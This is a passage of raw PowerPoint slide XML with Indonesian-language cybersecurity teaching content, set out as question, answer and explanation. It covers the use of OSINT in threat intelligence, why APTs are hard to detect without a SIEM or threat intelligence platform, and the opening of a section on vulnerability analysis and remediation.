            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bebas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OSINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> threat intelligence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hacker yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di forum underground </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebocoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (credential leaks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>repositori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OSINT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> scan APT pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> SIEM/TI platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keterbatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>indikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> APT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>APT (Advanced Persistent Threat)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> scan, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> stealth, persistence, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> supply chain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SIEM (Security Information and Event Management)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Threat Intelligence Platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Korelasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>-event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jejak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>butuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korelasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Threat intel feeds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>indikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IoC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicocokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>reaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> scan IOC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di endpoint), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</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191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396610057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Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
